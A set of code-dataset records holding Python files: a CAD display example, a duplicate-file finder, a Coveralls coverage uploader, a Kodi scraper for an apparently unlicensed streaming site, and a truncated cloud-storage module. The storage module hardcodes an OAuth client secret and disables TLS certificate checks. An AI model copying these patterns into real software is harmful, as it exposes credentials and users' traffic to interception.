wing.get_segment(isegment)\n\n display.DisplayShape(segment.get_loft().shape(), update=True)\n\n mirrored_shape = segment.get_mirrored_loft()\n if mirrored_shape is not None:\n display.DisplayShape(mirrored_shape.shape(), update=True)\n\n for iobj in range(1, config.get_external_object_count()+1):\n obj = config.get_external_object(iobj)\n shape = obj.get_loft()\n\n if shape is not None:\n display.DisplayShape(shape.shape(), update=True)\n\n mirrored_shape = obj.get_mirrored_loft()\n\n if mirrored_shape is not None:\n display.DisplayShape(mirrored_shape.shape(), update=True)\n\n display.FitAll()\n\n start_display()\n\n\nif __name__ == '__main__':\n tixi_h = tixi3wrapper.Tixi3()\n tigl_h = tigl3wrapper.Tigl3()\n\n dir_path = os.path.dirname(os.path.realpath(__file__))\n tixi_h.open(dir_path + \"/../../tests/unittests/TestData/D150_v30.xml\")\n tigl_h.open(tixi_h, \"\")\n\n display_configuration(tigl_h)\n","sub_path":"examples/python_internal/example_visualization.py","file_name":"example_visualization.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"594793074","text":"# Based on Andre Torres' tutorial here:\n# https://www.pythoncentral.io/finding-duplicate-files-with-python/\n\nimport os\nimport sys\nimport hashlib\n\ndef findDup(parentFolder):\n\t# Dups in format {hash:[names]}\n\tdups = {}\n\tfor dirName, subdirs, fileList in os.walk(parentFolder):\n\t\tprint('Scanning %s...' % dirName)\n\t\tcounter = 0\n\t\tfor filename in fileList:\n\t\t\tcounter += 1\n\t\t\tsys.stdout.write('\\rfiles scanned: {}'.format(counter))\n\t\t\tsys.stdout.flush()\n\t\t\t# Get the path to the file\n\t\t\tpath = os.path.join(dirName, filename)\n\t\t\t# Calculate hash\n\t\t\tfile_hash = hashfile(path)\n\t\t\t# Add or append the file path\n\t\t\tif file_hash in dups:\n\t\t\t\tdups[file_hash].append(path)\n\t\t\telse:\n\t\t\t\tdups[file_hash] = [path]\n\n\treturn dups\n\n# Join two dictionaries\ndef joinDicts(dict1, dict2):\n\tfor key in dict2.keys():\n\t\tif key in dict1:\n\t\t\tdict1[key] = dict1[key] + dict2[key]\n\t\telse:\n\t\t\tdict1[key] = dict2[key]\n\ndef hashfile(path, blocksize = 65536):\n\tafile = open(path, 'rb')\n\thasher = hashlib.md5()\n\tbuf = afile.read(blocksize)\n\twhile len(buf) > 0:\n\t\t\thasher.update(buf)\n\t\t\tbuf = afile.read(blocksize)\n\tafile.close()\n\treturn hasher.hexdigest()\n\ndef printResults(dict1):\n\tresults = list(filter(lambda x: len(x) > 1, dict1.values()))\n\tif len(results) > 0:\n\t\tprint('\\n\\n{} duplicates found:'.format(len(results)))\n\t\tprint('The following files are identical. The name could differ, but the content is identical')\n\t\tprint('___________________')\n\t\tfor result in results:\n\t\t\tfor subresult in result:\n\t\t\t\tprint('\\t%s' % subresult)\n\t\t\tprint('___________________')\n\n\telse:\n\t\tprint('No duplicate files found.')\n\nif __name__ == '__main__':\n\tif len(sys.argv) > 1:\n\t\tdups = {}\n\t\tfolders = sys.argv[1:]\n\t\tfor i in folders:\n\t\t\t# Iterate the folders given\n\t\t\tif os.path.exists(i):\n\t\t\t\t# Find the duplicated files and append them to the dups\n\t\t\t\tjoinDicts(dups, findDup(i))\n\t\t\telse:\n\t\t\t\tprint('{} is not a valid path, please verify'.format(i))\n\t\t\t\tsys.exit()\n\t\tprintResults(dups)\n\telse:\n\t\tprint(\n\t\t\t'Usage:\\t\\tOption #1. python {} folder\\n'\\\n\t\t\t\t.format(os.path.basename(__file__)) + \n\t\t\t'\\t\\tOption #2. python {} folder1 folder2 folder3'\\\n\t\t\t\t.format(os.path.basename(__file__))\n\t\t)","sub_path":"dupFinder.py","file_name":"dupFinder.py","file_ext":"py","file_size_in_byte":2145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"126306204","text":"import argparse\nimport hashlib\nimport json\nimport os\nimport re\n\nfrom glob import glob\nfrom hashlib import md5\nfrom itertools import chain\nfrom multiprocessing import Pool\nfrom sys import argv\nfrom typing import Dict\n\ndef log_error(msg: str):\n print('\\u001b[31merror: {}\\u001b[0m'.format(msg))\n\ndef log_warning(msg: str):\n print('\\u001b[93mwarning: {}\\u001b[0m'.format(msg))\n\ndef log_info(msg: str):\n print('\\u001b[94minfo: {}\\u001b[0m'.format(msg))\n\nclass LlvmCoverageClass():\n \"\"\"An invidual class within a coverage report.\n \n Arguments:\n project_source_files: [str]: an array of source file paths\n source: str: actual source of the file being covered\n \"\"\"\n def __init__(self, project_source_files: [str], source: str):\n self.project_source_files = project_source_files\n self.source = source\n self.line_coverage_data = list(\n map(self.__coverage_for_line,\n source.splitlines()))\n\n @property\n def is_path_on_first_line(self) -> bool:\n \"\"\"Whether or not the path of the file is included in the report.\n\n Llvm coverage reports contain a filepath on the first line\n of the class being tested if and only if multiple classes\n are being tested, otherwise, we have to find the correct\n file.\n\n Returns:\n bool: True if filepath is included in report, False if not\n \"\"\"\n path = self.source.split(\"\\n\")[0].replace(\":\", \"\")\n return path.lstrip().startswith(\"1|\") is False\n\n @property\n def raw_source(self) -> str:\n \"\"\"Return a report stripped of all coverage artifacts.\n\n Class reports contain a prefix with the line number,\n followed by the coverage number. We need the raw\n source to compare the checksum to the original file.\n\n Returns:\n str: The raw source of the covered file.\n \"\"\"\n return '\\n'.join(list(\n map(lambda line: line.split('|')[-1],\n self.source.splitlines())))\n\n @property\n def source_file_path(self) -> bytes:\n \"\"\"Find the filepath for the file tests from the report.\n \n See #is_path_on_first_line for more details.\n\n Returns:\n bytes: filepath for the source file\n \"\"\"\n if self.is_path_on_first_line:\n return self.source.split(\"\\n\")[0].replace(\":\", \"\").encode('utf-8')\n else:\n # if llvm-cov was run with just one matching source file\n # it doesn't print the source path in this case,.\n # we have to find it ourselves.\n digest = md5()\n digest.update(self.raw_source.encode('utf-8'))\n our_hex = digest.digest()\n\n for file in self.project_source_files:\n if file is None or file is '':\n continue\n digest = md5()\n digest.update(open(file).read().encode('utf-8'))\n file_hex = digest.digest()\n # compare checksums\n if our_hex == file_hex:\n return os.fsencode(file)\n\n @property\n def payload(self) -> Dict[str, any]:\n \"\"\"Create a new payload to send to coveralls.\n\n The payload is a hash representing a source code file and\n its coverage data for a single job.\n\n Returns:\n Dict[str, any]: payload to be sent to coveralls\n \"\"\"\n return {\n 'name': os.path.relpath(self.source_file_path).decode('utf-8'),\n 'source_digest': md5(self.source.encode('utf-8')).hexdigest(),\n 'coverage': self.line_coverage_data\n }\n\n def __coverage_for_line(self, line: str) -> int:\n \"\"\"Parse coverage count for a given line of code.\n \n Each line contains a prefix with the line number\n and coverage count. Fetch the coverage count.\n\n Arguments:\n line: str: line of code to be parsed\n Returns:\n int: coverage count of the line\n \"\"\"\n line = re.sub(\":\", \"|\", line)\n\n match = re.match(r'.*(\\s*)(\\d*)\\|(\\s*)(\\d+)', line)\n if match is not None:\n group = match.group(4)\n\n if match is None or group is None:\n # check for thousands or millions (llvm-cov outputs hit counts as 25.3k or 3.8M)\n did_match = re.match(r'/^(\\s*)(\\d+)\\|(\\s*)(\\d+\\.\\d+)(k|M)\\|/', line)\n\n if did_match is not None:\n group = did_match.group(4)\n units_group = did_match.group(5)\n count = group.strip()\n units = 1000 if units_group == 'k' else 1000000\n int((float(count) * units))\n else:\n return None\n else:\n match = group.strip()\n if re.search(r'[0-9]+', match) is not None:\n return int(match)\n elif re.search(r'#+', match) is not None:\n return 0\n else:\n return None \n\nclass LlvmCoverageReport():\n \"\"\"A full coverage report containing 'n' files covered.\n \n Arguments:\n source_paths: [str]: an array of source file paths\n raw_coverage_data: str: the raw coverage report\n \"\"\"\n def __init__(self, source_paths: [str], raw_coverage_data: str):\n self.source_paths = source_paths\n self.raw_coverage_data = raw_coverage_data\n self.coverage_classes: [LlvmCoverageClass] = []\n # this check determines if the profdata was\n # generated from a single file\n if self.is_path_on_first_line is False:\n self.coverage_classes = [LlvmCoverageClass(source_paths, raw_coverage_data)]\n else:\n self.coverage_classes = list(\n map(lambda lines: LlvmCoverageClass(source_paths, lines),\n self.raw_coverage_data.split(\"\\n\\n\")[:-1]))\n\n @property\n def payload(self) -> [Dict[str, any]]:\n \"\"\"Create a new payload to send to coveralls.\n\n The payload is an array of hashes representing the source\n code files and its coverage data for a single job.\n\n Returns:\n Dict[str, any]: payload to be sent to coveralls\n \"\"\"\n return list(map(lambda cov: cov.payload, self.coverage_classes))\n \n @property\n def is_path_on_first_line(self) -> bool:\n \"\"\"Whether or not the path of the file is included in the report.\n\n Llvm coverage reports contain a filepath on the first line\n of the class being tested if and only if multiple classes\n are being tested, otherwise, we have to find the correct\n file.\n\n Returns:\n bool: True if filepath is included in report, False if not\n \"\"\"\n path = self.raw_coverage_data.split(\"\\n\")[0].replace(\":\", \"\")\n return path.lstrip().startswith(\"1|\") is False\n\ndef find_file(filename: str, directory: bytes) -> bytes:\n \"\"\"Find a filename recursively within a given directory.\n \n Arguments:\n filename: str: name of the file to be found (without path)\n directory: bytes: top level directory to be searched\n\n Returns:\n bytes: absolute path to file\n \"\"\"\n for root, dirs, filenames in os.walk(directory):\n if os.fsencode(filename) in filenames:\n return os.path.abspath(os.path.join(root, os.fsencode(filename)))\n for dir in dirs:\n find_file(filename, os.path.join(root, dir))\n\ndef map_coverage_files_to_coverage_payloads(file: bytes) -> [Dict[str, any]]:\n \"\"\"Map raw coverage files to their parsed payloads.\n\n Arguments:\n file: bytes: path to coverage file\n\n Returns:\n [Dict[str, any]]: an array containing each parsed coverage class\n \"\"\"\n xcproject_name = os.path.splitext(file)[0]\n log_info('finding file map for {}'.format(xcproject_name))\n filepath = find_file(\n '{}-OutputFileMap.json'.format(xcproject_name), \n os.fsencode('{}/Build/Intermediates.noindex'.format(derived_data_dir)))\n if filepath is None:\n filepath = find_file(\n '{}-OutputFileMap.json'.format(xcproject_name), \n os.fsencode('OutputFileMaps'))\n print (\"filepath for {} is: {}\".format(file, filepath))\n source_paths = list(map(\n lambda json: json,\n json.loads(open(filepath).read())))\n log_info('parsing llvm coverage report for {}'.format(xcproject_name))\n return LlvmCoverageReport(\n source_paths, \n open(os.path.join(coverage_data_dir, file)).read()).payload\n\ndef send_payload_to_coveralls(payload_json: str):\n from urllib import request, parse\n url = 'https://coveralls.io/api/v1/jobs'\n req = request.Request(url, data=parse.urlencode({ 'json': payload_json }).encode('utf-8'))\n return request.urlopen(req)\n\n\"\"\"\nFind and parse coverage files into coveralls payload.\nDeliver to coveralls.\n\"\"\"\nparser = argparse.ArgumentParser()\nparser.add_argument('-rt',\n '--repo-token',\n help='the repo_token provided for your coveralls repo')\nparser.add_argument('-dd',\n '--derived-data-dir',\n help='the path to your derived data directory')\nparser.add_argument('-cd',\n '--coverage-data-dir',\n help='the directory where coverage data has been generated')\nparser.add_argument('-pr',\n '--pull-request-id',\n help='the associated pull request id of the build')\nparser.add_argument('-b',\n '--build-number',\n help='the number of this build')\nparser.add_argument('-sha',\n '--commit-sha',\n help='the sha of this git commit')\nargs = parser.parse_args()\n\nfrom datetime import datetime\n\nstart = datetime.now()\n\nrepo_token = args.repo_token\ncoverage_data_dir = args.coverage_data_dir\nderived_data_dir = args.derived_data_dir\npull_request_id = args.pull_request_id\nbuild_number = args.build_number\ncommit_sha = args.commit_sha\n\nif repo_token is None:\n log_error(\n 'must provide repo token. please see --help for more info')\n exit(1)\nif coverage_data_dir is None:\n coverage_data_dir = './CoverageData'\n log_warning(\n 'coverage data directory not provided. defaulting to ./CoverageData')\nif derived_data_dir is None:\n derived_data_dir = './localDerivedData'\n log_warning(\n 'derived data directory not provided. defaulting to ./localDerivedData')\n\nwith Pool(processes=4) as p:\n coverage_payloads = p.map(\n map_coverage_files_to_coverage_payloads,\n os.listdir(coverage_data_dir))\n\n payload_json = json.dumps({\n 'repo_token': repo_token,\n 'service_name': 'evergreen',\n 'service_number': build_number,\n 'service_pull_request': pull_request_id,\n 'commit_sha': commit_sha,\n 'source_files': list(chain(*coverage_payloads)),\n })\n\n log_info('coveralls response: {}'.format(send_payload_to_coveralls(payload_json).read()))\n end = datetime.now()\n log_info('xccoveralls took {} to run'.format(end - start))\n","sub_path":"scripts/xccoveralls.py","file_name":"xccoveralls.py","file_ext":"py","file_size_in_byte":11068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"226845063","text":"# -*- coding: utf-8 -*-\nfrom resources.lib import logger\nfrom resources.lib.gui.gui import cGui\nfrom resources.lib.gui.guiElement import cGuiElement\nfrom resources.lib.handler.ParameterHandler import ParameterHandler\nfrom resources.lib.handler.requestHandler2 import cRequestHandler\nfrom resources.lib.parser import cParser\n\nSITE_IDENTIFIER = 'xcine_tv'\nSITE_NAME = 'XCine.tv'\nSITE_ICON = 'xcine_tv.png'\nURL_MAIN = 'https://xcine.tv/'\nURL_MOVIES = URL_MAIN + 'filme1?'\nURL_SHOWS = URL_MAIN + 'serien1?'\nURL_SEARCH = URL_MAIN + 'search?key=%s'\n\ndef load():\n\tlogger.info(\"Load %s\" % SITE_NAME)\n\tparams = ParameterHandler()\n\tparams.setParam('sUrl', URL_MOVIES)\n\tcGui().addFolder(cGuiElement('Filme', SITE_IDENTIFIER, 'showMenu'), params)\n\tparams.setParam('sUrl', URL_SHOWS)\n\tcGui().addFolder(cGuiElement('Serien', SITE_IDENTIFIER, 'showMenu'), params)\n\tcGui().addFolder(cGuiElement('Suche', SITE_IDENTIFIER, 'showSearch'))\n\tcGui().setEndOfDirectory()\n\ndef showMenu():\n\toGui = cGui()\n\tparams = ParameterHandler()\n\tbaseURL = params.getValue('sUrl')\n\tparams.setParam('sUrl', baseURL + 'sort=top&sort_type=desc')\n\toGui.addFolder(cGuiElement('Update', SITE_IDENTIFIER, 'showEntries'), params)\n\tparams.setParam('sUrl', baseURL + 'sort=year&sort_type=desc')\n\toGui.addFolder(cGuiElement('Year', SITE_IDENTIFIER, 'showEntries'), params)\n\tparams.setParam('sUrl', baseURL + 'sort=name&sort_type=desc')\n\toGui.addFolder(cGuiElement('Name', SITE_IDENTIFIER, 'showEntries'), params)\n\tparams.setParam('sUrl', baseURL + 'sort=imdb_rate&sort_type=desc')\n\toGui.addFolder(cGuiElement('IMDB', SITE_IDENTIFIER, 'showEntries'), params)\n\tparams.setParam('sUrl', baseURL + 'sort=rate_point&sort_type=desc')\n\toGui.addFolder(cGuiElement('Rate', SITE_IDENTIFIER, 'showEntries'), params)\n\tparams.setParam('sUrl', baseURL + 'sort=view_total&sort_type=desc')\n\toGui.addFolder(cGuiElement('View', SITE_IDENTIFIER, 'showEntries'), params)\n\tparams.setParam('sUrl', baseURL)\n\toGui.addFolder(cGuiElement('Genre', SITE_IDENTIFIER, 'showGenre'), params)\n\toGui.setEndOfDirectory()\n\ndef showGenre():\n\tparams = ParameterHandler()\n\tentryUrl = params.getValue('sUrl')\n\tsHtmlContent = cRequestHandler(entryUrl).request()\n\tpattern = 'Genre.*?
    '\n\tisMatch, sContainer = cParser.parseSingleResult(sHtmlContent, pattern)\n\n\tif isMatch:\n\t\tpattern = 'value=\"([^\"]+)\">([^<]+)'\n\t\tisMatch, aResult = cParser.parse(sContainer, pattern)\n\tif not isMatch:\n\t\tcGui().showInfo()\n\t\treturn\n\n\tfor sID, sName in sorted(aResult, key=lambda k: k[1]):\n\t\tparams.setParam('sUrl', entryUrl + 'category=' + sID + '&country=&sort=&key=&sort_type=desc')\n\t\tcGui().addFolder(cGuiElement(sName.strip(), SITE_IDENTIFIER, 'showEntries'), params)\n\tcGui().setEndOfDirectory()\n\ndef showEntries(entryUrl=False, sGui=False, sSearchText=False):\n\toGui = sGui if sGui else cGui()\n\tparams = ParameterHandler()\n\tif not entryUrl: entryUrl = params.getValue('sUrl')\n\tiPage = int(params.getValue('page'))\n\toRequest = cRequestHandler(entryUrl + '&page=' + str(iPage) if iPage > 0 else entryUrl, ignoreErrors=(sGui is not False))\n\toRequest.addHeaderEntry('Referer',URL_MAIN)\n\toRequest.addHeaderEntry('Upgrade-Insecure-Requests', '1')\n\toRequest.addParameters('load','full-page')\n\toRequest.setRequestType(1)\n\tsHtmlContent = oRequest.request()\n\tpattern = '
    [\\s\\S]*?<\\/a>\\s<\\/div>'\n\tisMatch, sContainer = cParser.parseSingleResult(sHtmlContent, pattern)\n\n\tif isMatch:\n\t\tpattern = '(.*?)<\\/b>'\n\t\tisMatch, aResult = cParser.parse(sContainer, pattern)\n\n\tif not isMatch:\n\t\tif not sGui: oGui.showInfo()\n\t\treturn\n\n\tcf = cRequestHandler.createUrl(entryUrl, oRequest)\n\ttotal = len(aResult)\n\tfor sUrl, sThumbnail, sName in aResult:\n\t\tsName = sName.replace(' stream', '')\n\t\tif sSearchText and not cParser().search(sSearchText, sName):\n\t\t\tcontinue\n\t\tsThumbnail = sThumbnail.replace('_thumb', '') + cf\n\t\tisMatch, sYear = cParser.parse(sName, \"(.*?)\\((\\d*)\\)\")\n\t\tfor name, year in sYear:\n\t\t\tsName = name\n\t\t\tsYear = year\n\t\t\tbreak\n\n\t\tisTvshow = True if 'staffel' in sUrl or 'staffel' in sName else False\n\t\tif 'sort=year&sort_type=desc' in entryUrl and not isTvshow:\n\t\t\tsName += ' (' + str(sYear) + ')'\n\t\toGuiElement = cGuiElement(sName, SITE_IDENTIFIER, 'showEpisodes' if isTvshow else 'showAllHosters')\n\t\toGuiElement.setMediaType('tvshow' if isTvshow else 'movie')\n\t\toGuiElement.setThumbnail(sThumbnail)\n\t\toGuiElement.setFanart(sThumbnail)\n\t\tif sYear:\n\t\t\toGuiElement.setYear(sYear)\n\t\tparams.setParam('entryUrl', sUrl)\n\t\tparams.setParam('sName', sName)\n\t\tparams.setParam('sThumbnail', sThumbnail)\n\t\toGui.addFolder(oGuiElement, params, isTvshow, total)\n\tif not sGui:\n\t\tsPageNr = int(params.getValue('page'))\n\t\tif sPageNr == 0:\n\t\t\tsPageNr = 2\n\t\telse:\n\t\t\tsPageNr += 1\n\t\tparams.setParam('page', int(sPageNr))\n\t\tparams.setParam('sUrl', entryUrl)\n\t\toGui.addNextPage(SITE_IDENTIFIER, 'showEntries', params)\n\t\toGui.setView('tvshows' if URL_SHOWS in entryUrl else 'movies')\n\t\toGui.setEndOfDirectory()\n\n\ndef showEpisodes():\n\tparams = ParameterHandler()\n\tsUrl = cParser.urlEncode(params.getValue('entryUrl'),':|/') + '/folge-1'\n\tsThumbnail = params.getValue('sThumbnail')\n\tsHtmlContent = cRequestHandler(sUrl).request()\n\tpattern = 'data-episode-id=\"([\\d]+).*?folge.*?([\\d]+)'\n\tisMatch, aResult = cParser.parse(sHtmlContent, pattern)\n\tpattern = 'data-movie-id=\"([\\d]+)'\n\tisMatch, sID = cParser.parse(sHtmlContent, pattern)\n\n\tif not isMatch:\n\t\tcGui().showInfo()\n\t\treturn\n\n\ttotal = len(aResult)\n\tfor eID, eNr in aResult:\n\t\toGuiElement = cGuiElement('Folge ' + eNr , SITE_IDENTIFIER, \"showAllHosters\")\n\t\toGuiElement.setThumbnail(sThumbnail)\n\t\toGuiElement.setFanart(sThumbnail)\n\t\tparams.setParam('eID', eID)\n\t\tparams.setParam('sID', sID[0])\n\t\tcGui().addFolder(oGuiElement, params, False, total)\n\tcGui().setView('episodes')\n\tcGui().setEndOfDirectory()\n\t\ndef showAllHosters():\n\thosters = []\n\teID = ParameterHandler().getValue('eID')\n\tsID = ParameterHandler().getValue('sID')\n\trUrl = ParameterHandler().getValue('entryUrl')\n\tsUrl = cParser.urlEncode(ParameterHandler().getValue('entryUrl'),':|/') + '/deutsch'\n\tif eID == False or sID == False:\n\t\toRequest = cRequestHandler(sUrl)\n\t\toRequest.addHeaderEntry('Origin',URL_MAIN)\n\t\toRequest.addHeaderEntry('Referer',sUrl)\n\t\tsHtmlContent = oRequest.request()\n\t\tpattern = 'data-movie-id=\"(.*?)\"[\\s\\S]*?data-episode-id=\"(.*?)\"'\n\t\tisMatch, aResult = cParser().parse(sHtmlContent, pattern)\n\t\tif isMatch:\n\t\t\tsID = aResult[0][0]\n\t\t\teID = aResult[0][1]\n\n\tfor server in ['0','1','2']:\n\t\ttry:\n\t\t\toRequest = cRequestHandler(URL_MAIN + 'movie/load-stream/' + sID + '/' + eID + '?server=' + server)\n\t\t\toRequest.addHeaderEntry('X-Requested-With', 'XMLHttpRequest')\n\t\t\toRequest.addHeaderEntry('Referer', rUrl)\n\t\t\tsHtmlContentBase = oRequest.request()\n\t\t\ttry:\n\t\t\t\tpattern = 'urlVideo = \"([^\"]+)'\n\t\t\t\tisMatch, hUrl = cParser().parse(sHtmlContentBase, pattern)\n\t\t\t\tif isMatch:\n\t\t\t\t\toRequest = cRequestHandler(hUrl[0])\n\t\t\t\t\toRequest.addHeaderEntry('Referer',sUrl)\n\t\t\t\t\toRequest.addHeaderEntry('Origin',URL_MAIN)\n\t\t\t\t\tsHtmlContent = oRequest.request()\n\t\t\t\t\turl = cParser().urlparse(hUrl[0])\n\t\t\t\t\tpattern = 'RESOLUTION=\\d+x([\\d]+)([^#]+)'\n\t\t\t\t\tisMatch, aResult = cParser().parse(sHtmlContent, pattern)\n\t\t\t\t\tif isMatch:\n\t\t\t\t\t\tfor sQualy, sUrl in aResult:\n\t\t\t\t\t\t\thoster = {'link': 'https://' + url + sUrl, 'name':'S' +server+ ' - ' + sQualy}\n\t\t\t\t\t\t\thosters.append(hoster)\n\t\t\texcept:pass\n\t\t\ttry:\n\t\t\t\tpattern = 'var sources = (\\[.*?\\]);'\n\t\t\t\tisMatch, sContainer = cParser.parseSingleResult(sHtmlContentBase, pattern)\n\t\t\t\tif isMatch:\n\t\t\t\t\tpattern = r'\"file\":\"(.+?)\",\"label\":\"(.+?)\",\"type\":\"(.+?)\"'\n\t\t\t\t\tisMatch, aResult = cParser().parse(sContainer, pattern)\n\t\t\t\t\tif isMatch:\n\t\t\t\t\t\tfor sUrl,sQualy,stype in aResult:\n\t\t\t\t\t\t\thoster = {'link': sUrl, 'name':'S' +server+ ' - ' + sQualy}\n\t\t\t\t\t\t\thosters.append(hoster)\n\t\t\texcept:pass\n\t\texcept:pass\n\tif hosters:hosters.append('getHosterUrl')\n\treturn hosters\n\ndef getHosterUrl(sUrl=False):\n\tsUrl = sUrl + '|verifypeer=false&Origin=https%3A%2F%2Fhdfilme.cc%2F&Referer=https%3A%2F%2Fhdfilme.cc%2F'\n\treturn [{'streamUrl': sUrl, 'resolved': True}]\n\ndef showSearch():\n\tsSearchText = cGui().showKeyBoard()\n\tif not sSearchText: return\n\t_search(False, sSearchText)\n\tcGui().setEndOfDirectory()\n\ndef _search(oGui, sSearchText):\n\tshowEntries(URL_SEARCH % cParser().quotePlus(sSearchText), oGui, sSearchText)\n","sub_path":"plugin.video.OTV_MEDIA/resources/sites/xcine_tv.py","file_name":"xcine_tv.py","file_ext":"py","file_size_in_byte":8336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"523076500","text":"import json\nimport mimetypes\nimport os\nimport shutil\nimport StringIO\nimport sys\nimport tempfile\nimport urllib\n\n# s3 needs boto\nsys.path.append(\"lib/boto.zip\")\nimport boto\nimport boto.s3\nimport boto.s3.connection\n\n# google needs httplib2 and oauth2\n# TODO: Ditch their implementation and roll our own because httplib2 doesn't support\n# streaming file uploads or downloads. Currently we only support what will fit in\n# memory.\nsys.path.append(\"lib/httplib2.zip\")\nsys.path.append(\"lib/oauth2client.zip\")\nsys.path.append(\"lib/\")\nimport httplib2\nimport oauth2client.client\n\nUSER_AGENT = \"python/2.7 (gzip)\"\n\n# NOOP with provider\nclass Withable():\n def __init__(self, obj):\n self.obj = obj\n\n def __enter__(self):\n return self.obj\n\n def __exit__(self, type, value, tb):\n pass\n\ndef getenv(env, keys):\n for k in keys:\n if k in env:\n return env[k]\n # keys can be prefixed with \"APPSOMA_\"\n k = \"APPSOMA_\" + k\n if k in env:\n return env[k]\n return \"\"\n\n# storage provider for local files\nclass LocalProvider:\n def get(self, env, name):\n return open(name, \"rb\")\n\n def put(self, env, name, rdr):\n with open(name, \"wb\") as f:\n shutil.copyfileobj(rdr, f)\n\n# storage provider for azure\nclass AzureBlobStorageProvider:\n def get(self, env, name):\n raise Exception(\"not implemented\")\n\n def put(self, env, name, rdr):\n raise Exception(\"not implemented\")\n\n# storage provider for google (via boto)\nclass GoogleCloudStorageProvider:\n # returns (access key id, secret key)\n def get_legacy(self, env):\n return getenv(env, [\"GS_ACCESS_KEY_ID\"]), getenv(env, [\"GS_SECRET_ACCESS_KEY\"])\n\n # returns (client id, client secret, refresh token)\n def get_oauth(self, env):\n client_id = getenv(env, [\"GS_CLIENT_ID\"]) or \"783971554630-2ujdj92b4n0i7nc81pgjv2udsatktb1m.apps.googleusercontent.com\"\n client_secret = getenv(env, [\"GS_CLIENT_SECRET\"]) or \"6hPHVxn_uvMHeU5knpk62M7A\"\n refresh_token = getenv(env, [\"GS_REFRESH_TOKEN\"])\n return client_id, client_secret, refresh_token\n\n def get_access_token(self, client_id, client_secret, refresh_token):\n http = httplib2.Http(disable_ssl_certificate_validation=True)\n res, content = http.request(\"https://www.googleapis.com/oauth2/v3/token\", \"POST\",\n body=\"client_id=\" + client_id +\n \"&client_secret=\" + client_secret +\n \"&refresh_token=\" + refresh_token +\n \"&grant_type=refresh_token\",\n headers={\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"Accept\": \"application/json\",\n \"User-Agent\": USER_AGENT\n })\n if res.status != 200:\n raise Exception(\"error retrieving access token: \" + res.reason)\n obj = json.loads(content)\n return obj[\"access_token\"]\n\n def get_media(self, access_token, bucket, path):\n http = httplib2.Http(disable_ssl_certificate_validation=True)\n credentials = oauth2client.client.AccessTokenCredentials(access_token, USER_AGENT)\n http = credentials.authorize(http)\n res, contents = http.request(\"https://www.googleapis.com/storage/v1/b/\" + bucket + \"/o/\" + path + \"?alt=media\")\n if res.status != 200:\n raise Exception(\"error retrieving media: \" + res.reason)\n return contents\n\n def put_media(self, access_token, bucket, path, rdr):\n http = httplib2.Http(disable_ssl_certificate_validation=True)\n credentials = oauth2client.client.AccessTokenCredentials(access_token, USER_AGENT)\n http = credentials.authorize(http)\n ct, _ = mimetypes.guess_type(path)\n if not ct:\n ct = \"application/octet-stream\"\n # see https://cloud.google.com/storage/docs/json_api/v1/how-tos/upload#simple\n res, contents = http.request(\n \"https://www.googleapis.com/upload/storage/v1/b/\" + bucket + \"/o\" +\n \"?uploadType=media\" +\n \"&name=\" + urllib.quote(path),\n \"POST\",\n body=rdr.read(),\n headers={\n \"Content-Type\": ct\n })\n if res.status != 200:\n raise Exception(\"error setting media: \" + res.reason)\n return contents\n\n def get_bucket_and_path(self, env, name):\n # gs://...\n if not name.startswith(\"gs://\"):\n raise Exception(\"invalid url: expected gs://\")\n\n # bucket/path...\n parts = name[5:].split(\"/\")\n if len(parts) < 2:\n raise Exception(\"invalid url: expected bucket and path\")\n\n return parts.pop(0), \"/\".join(parts)\n\n def get(self, env, name):\n bucket, path = self.get_bucket_and_path(env, name)\n access_key, secret_key = self.get_legacy(env)\n if access_key and secret_key:\n conn = boto.gs.GSConnection(access_key, secret_key)\n key = conn.get_bucket(bucket).get_key(path)\n key.open_read()\n return Withable(key)\n\n client_id, client_secret, refresh_token = self.get_oauth(env)\n if client_id and client_secret and refresh_token:\n access_token = self.get_access_token(client_id, client_secret, refresh_token)\n media = self.get_media(access_token, bucket, path)\n return Withable(StringIO.StringIO(media))\n else:\n raise Exception(\"expected refresh token\")\n\n def put(self, env, name, rdr):\n bucket, path = self.get_bucket_and_path(env, name)\n access_key, secret_key = self.get_legacy(env)\n if access_key and secret_key:\n conn = boto.gs.GSConnection(access_key, secret_key)\n # create a key\n key = boto.s3.key.Key(bucket)\n key.key = path\n # if the rdr has a seek method, we'll assume it's a file\n if hasattr(rdr, \"seek\"):\n key.set_contents_from_file(rdr)\n # otherwise we have to write to a temp file (boto never bothered to\n # implement streaming uploads)\n else:\n with tempfile.SpooledTemporaryFile(100 * 1024) as fd:\n shutil.copyfileobj(rdr, fd)\n fd.seek(0, os.SEEK_SET)\n key.set_contents_from_file(fd)\n return\n\n client_id, client_secret, refresh_token = self.get_oauth(env)\n if client_id and client_secret and refresh_token:\n access_token = self.get_access_token(client_id, client_secret, refresh_token)\n self.put_media(access_token, bucket, path, rdr)\n else:\n raise Exception(\"expected refresh token\")\n\n# storage provider for s3 (via boto)\nclass S3Provider:\n def bucket_and_path(self, env, name):\n # s3://...\n if not name.startswith(\"s3://\"):\n raise Exception(\"invalid url: expected s3://\")\n\n # bucket/path...\n parts = name[5:].split(\"/\")\n if len(parts) < 2:\n raise Exception(\"invalid url: expected bucket and path\")\n\n # pull the keys from the environment\n aws_access_key = getenv(env, [\"AWS_ACCESS_KEY\", \"AWS_ACCESS_KEY_ID\"])\n aws_secret_key = getenv(env, [\"AWS_SECRET_KEY\"])\n\n # connect to s3\n conn = boto.s3.connection.S3Connection(aws_access_key, aws_secret_key)\n # get the bucket (the first path entry)\n bucket = conn.get_bucket(parts.pop(0))\n return bucket, \"/\".join(parts)\n\n def get(self, env, name):\n bucket, path = self.bucket_and_path(env, name)\n # get the key\n key = bucket.get_key(path)\n # open it for reading\n key.open_read()\n return Withable(key)\n\n def put(self, env, name, rdr):\n bucket, path = self.bucket_and_path(env, name)\n # create a key\n key = boto.s3.key.Key(bucket)\n key.key = path\n # if the rdr has a seek method, we'll assume it's a file\n if hasattr(rdr, \"seek\"):\n key.set_contents_from_file(rdr)\n # otherwise we have to write to a temp file (boto never bothered to\n # implement streaming uploads)\n else:\n with tempfile.SpooledTemporaryFile(100 * 1024) as fd:\n 